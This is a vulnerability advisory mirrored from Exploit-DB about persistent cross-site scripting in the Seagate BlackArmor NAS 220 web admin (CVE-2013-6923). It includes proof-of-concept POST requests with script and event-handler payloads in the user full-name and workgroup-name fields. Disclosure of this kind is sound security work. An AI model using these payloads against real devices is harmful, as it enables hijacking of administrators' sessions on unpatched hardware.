Seagate BlackArmor NAS - Multiple Persistent Cross Site Scripting Vulnerabilities

vendor:

BlackArmor NAS 220

by:

Jeroen - IT Nerdbox

8,8

CVSS

HIGH

Persistent Cross Site Scripting

CWE

Product Name: BlackArmor NAS 220

Affected Version From: sg2000-2000.1331

Affected Version To: sg2000-2000.1331

Patch Exists: NO

Related CWE: CVE-2013-6923

CPE: h:seagate:blackarmor_nas_220

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

Seagate BlackArmor NAS – Multiple Persistent Cross Site Scripting Vulnerabilities

When adding a user to the device, it is possible to enter a full name. This input field does not sanitize its input and it is possible to enter any payload which will get executed upon reload. The workgroup configuration is also vulnerable to persistent XSS. The Work Group name input field does not sanitize its input.

Mitigation:

Input validation should be used to detect and prevent malicious input from entering the system.

Source

Exploit-DB raw data:

# Exploit Title: Seagate BlackArmor NAS - Multiple Persistent Cross Site
Scripting Vulnerabilities

# Google Dork: N/A

# Date: 04-01-2014

# Exploit Author: Jeroen - IT Nerdbox

# Vendor Homepage:  <http://www.seagate.com/> http://www.seagate.com/

# Software Link:
<http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
>
http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/

# Version: sg2000-2000.1331

# Tested on: N/A

# CVE : CVE-2013-6923

#

## Description:

#

# When adding a user to the device, it is possible to enter a full name.
This input field does not

# sanitize its input and it is possible to enter any payload which will get
executed upon reload.

#

# The workgroup configuration is also vulnerable to persistent XSS. The Work
Group name input 
# field does not sanitize its input.

#
# This vulnerability was reported to Seagate in September 2013, they stated
that this will not be fixed. 

#

## Proof of Concept #1:

# 

# POST: http(s)://<url | ip>/admin/access_control_user_edit.php?id=2&lang=en
# Parameters:

#

# index = 2
# fullname = <script>alert(1);</script>
# submit = Submit

# 

#

## Proof of Concept #2:

#

# POST: http(s)://<url |
ip>/admin/network_workgroup_domain.php?lang=en&gi=n003

# Parameter:

#

# workname = "><input onmouseover=prompt(1) >